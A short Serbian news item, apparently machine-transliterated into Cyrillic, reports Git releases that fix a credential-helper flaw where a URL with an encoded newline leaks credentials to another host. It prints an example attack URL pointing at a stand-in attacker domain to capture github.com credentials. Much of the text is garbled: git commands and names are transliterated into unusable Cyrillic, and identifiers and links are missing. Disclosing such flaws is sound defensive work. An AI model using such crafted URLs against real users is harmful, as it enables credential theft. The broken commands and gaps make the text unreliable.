корективна издања дистрибуираног система за контролу извора Гит 2.26.1, 2.25.3, 2.24.2, 2.23.2, 2.22.3, 2.21.2, 2.20.3, 2.19.4, 2.18.3 и 2.17.4, у који је елиминисао () у руковаоцу "“, што узрокује да се акредитиви шаљу погрешном хосту када гит клијент приступи спремишту користећи посебно форматиран УРЛ који садржи знак новог реда. Рањивост се може користити за организовање слања акредитива са другог хоста на сервер који контролише нападач.
Када наведете УРЛ као што је „хттпс://евил.цом?%0ахост=гитхуб.цом/“, руковалац акредитива приликом повезивања са хостом евил.цом ће проследити параметре аутентификације наведене за гитхуб.цом. Проблем се јавља када се обављају операције као што је „гит цлоне“, укључујући обраду УРЛ-ова за подмодуле (на пример, „гит субмодуле упдате“ ће аутоматски обрадити УРЛ адресе наведене у .гитмодулес датотеци из спремишта). Рањивост је најопаснија у ситуацијама када програмер клонира спремиште а да не види УРЛ, на пример, када ради са подмодулима, или у системима који извршавају аутоматске радње, на пример, у скриптама за прављење пакета.
За блокирање рањивости у новим верзијама преношење знака новог реда у било којој вредности која се преноси кроз протокол за размену акредитива. За дистрибуције, можете пратити издавање ажурирања пакета на страницама , , , , , , .
Као решење за блокирање проблема Немојте користити цредентиал.хелпер када приступате јавним спремиштима и немојте користити "гит цлоне" у режиму "--рецурсе-субмодулес" са непровереним репозиторијумима. Да бисте потпуно онемогућили руковалац цредентиал.хелпер, што и јесте и преузимање лозинки са , заштићено или датотеку са лозинкама, можете користити команде:
гит цонфиг --унсет цредентиал.хелпер
гит цонфиг --глобал --унсет цредентиал.хелпер
гит цонфиг --систем --унсет цредентиал.хелпер
Извор: опеннет.ру